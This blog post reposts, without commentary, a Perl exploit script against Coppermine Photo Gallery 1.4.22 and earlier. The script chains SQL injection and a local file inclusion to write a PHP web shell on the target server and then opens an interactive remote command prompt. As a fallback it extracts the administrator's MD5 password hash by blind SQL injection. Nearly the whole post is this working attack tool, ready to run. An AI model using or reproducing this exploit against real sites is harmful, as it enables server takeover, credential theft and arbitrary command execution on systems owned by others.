miércoles, 27 de mayo de 2009

Coppermine Photo Gallery <= 1.4.22 Remote Exploit

#!/usr/bin/perl
# Coppermine Photo Gallery <= 1.4.22 Remote Exploit # Need register_globals = on and magic_quotes_gpc = off # Based on vulnerabilities discussed at http://www.milw0rm.org/exploits/8713 # Coded by girex use LWP::UserAgent; if(not defined $ARGV[0]) { banner(); print "[-] Usage: perl $0 [host] [path]\n"; print "[-] Example: perl $0 localhost /gallery/\n\n"; exit; } my $lwp = new LWP::UserAgent or die; my $target = $ARGV[0] =~ /^http:\/\// ? $ARGV[0]: 'http://' . $ARGV[0]; $target .= $ARGV[1] unless not defined $ARGV[1]; $target .= '/' unless $target =~ /^http:\/\/(.?)\/$/; my $uid = '1'; # Change if need my @chars = ('1'..'9', 'a'..'f'); my $injection = '';

banner();
$lwp->default_header('Accept-Language: en-us,en;q=0.5');

my $html = inj_request(' WHERE x'); # Wrong query to obtain an error

if(not defined $html)
{
print "[-] Request mistake. Exploit terminated!\n";
exit ();
}
elsif($html =~ /There was an error while processing a database query/)
{
print "[+] Site vulnerable. Trying to retrieve absolute path...\n";
}
else
{
print "[-] Site not vulnerable to SQL Injection in thumbnails.php\n";
print "[-] Maybe magic_quotes = On or register_globals = Off\n";
end_try();
}

# This LFI includes README.txt that contais php code with phpinfo() function.
my $res = $lwp->get("${target}index.php?GLOBALS[USER][ID]=5b83a5f92603efcdb65d47c9a2991d6b&GLOBALS[USER][lang]=../README.txt");

if($res->content =~ /_SERVER\[\"SCRIPT_FILENAME\"\]<\/td>(.*)index\.php<\/td><\/tr>/)
{
$path_to = $1;
}
else
{
print "[-] Unable to retrieve the absolute path. Problems with LFI.\n";
end_try();
}

$html = inj_request("AND 1=2 UNION ALL SELECT '${injection}' INTO OUTFILE '${path_to}logs/log_db.inc.php");
my $res = $lwp->get($target.'logs/log_db.inc.php');

if($res->is_success)
{
print "[+] Shell injected at ${path_to}logs/log_db.inc.php\n\n";
}
else
{
print "[-] Shell upload failed, MySQL cannot write to logs path!\n\n";
print "[+] Attempting to retrieve admin's md5..\n";
blind_sql();

if(length($hash) != 32)
{
print "\n\n[-] Exploit mistake: unable to retrieve admin's md5\n";
}
else
{
print "\n";
}

end_try();
}

while(1)
{
print "[+] coppermine\@shell:~\$ ";
chomp(my $cmd = );

end_try() if $cmd eq 'exit';

$lwp->default_header( 'CMD' => $cmd );
my $res = $lwp->get($target.'logs/log_db.inc.php');

if($res->is_success and $res->content =~ /12345/)
{
print "\n". substr($res->content, index($res->content, '12345') + 5)."\n";
}
else
{
print "[-] Something wrong, command execution failed!\n";
last;
}
}




sub inj_request
{
my $sql = shift;
my $res = $lwp->get($target. "thumbnails.php?lang=english&album=alpha&GLOBALS[cat]=999'+${sql}");

if($res->is_success)
{
return $res->content;
}

return undef;
}

sub blind_sql
{
our $hash = '';
my $prefix = get_prefix() or 'cpg14x';
my $username = get_username() or 'admin';

$| = 1;
print "[+] username: ${username} - md5 hash: ";

for($i = 1; $i <= 32; $i++) { foreach $char(@chars) { $html = inj_request("OR+SUBSTRING((SELECT+user_password+FROM+${prefix}_users+WHERE+user_id=${uid}),${i},1)='${char}'%23"); if($html =~ /The selected album\/file does not exist/) { $hash .= $char; syswrite(STDOUT, $char, 1); last; } } last if $i != length($hash); } } sub get_prefix # File update.php shows the query executed to update the tables, we can get table prefix from it { my $rv = undef; my $res = $lwp->get($target.'update.php');

if($res->is_success and $res->content =~ /CREATE TABLE IF NOT EXISTS (\w+)_sessions/)
{
$rv = $1;
}

return $rv;
}

sub get_username
{
my $rv = undef;
my $res = $lwp->get($target."profile.php?lang=english&uid=${uid}");

if($res->content =~ /(.*)'s profile<\/td>/)
{
$rv = $1;
}

return $rv;
}

sub end_try
{
my $res = $lwp->get($target.'register.php?lang=english');

if($res->is_success and $res->content !~ /You don't have permission to access this page/)
{
print "\n[+] Target can be vulnerable to SQL Injection for registered users\n";
print "[+] See http://www.milw0rm.org/exploits/8713 to know how to exploit it!\n\n";
}
else
{
print "\n[-] The target is NOT vulnerable to the SQL Injection for registered users\n\n";
}

exit;
}

sub banner
{
print "\n[+] Coppermine Photo Gallery <= 1.4.22 Remote Exploit\n";
print "[+] Coded by girex\n";
print "\n";
}

# milw0rm.com [2009-05-19]
By Unknown en miércoles, mayo 27, 2009
Etiquetas: ,

No hay comentarios.:

Publicar un comentario

Déjanos tu comentario, nos permitirá mejorar.
¿Qué opinas de este tema?
¿Tienes alguna duda o sugerencia?
¿Te parece adecuado y completo este tema?
¿Falta información? ¿Cual?

Suscribirse a: Comentarios de la entrada (Atom)

Etiquetas

INTERNET (459) newsweek (305) SEGURIDAD (224) software (136) HACK (86) GOOGLE (47) Hacker (46) Geek (41) hardware (36) WINDOWS (34) Hackers (31) CRACK (29) facebook (29) video (28) DESCARGA (27) videos (26) Celulares (25) MICROSOFT (22) Informatica (21) apple (19) GRATIS (18) technology (18) virus (18) exploit (17) computación (16) informatico (16) web (15) cracker (14) INALAMBRICO (13) WINDOWS 7 (13) noticias (11) MSN (10) termino (10) ACTUALIZACION (9) Gamer (9) LapTops (9) Mac (9) PASSWORD (9) WINDOWS XP (9) dns (9) firefox (9) juegos (9) FOTOS (8) cientifico (8) iphone (8) WEP (7) antivirus (7) bibliografia (7) Desencriptar (6) INFINITUM (6) wifi (6) youtube (6) Craker (5) Culiacan (5) DESMOSTRACION (5) TELEFONIA (5) gmail (5) messenger (5) DIRECTA (4) DOWNLOAD (4) ESPAÑOL (4) XBOX (4) xss (4) Glosario (3) HTML (3) WPA (3) anuncios (3) ataques (3) hosting (3) hotmail (3) Guru (2) ajax (2) wpa2 (2)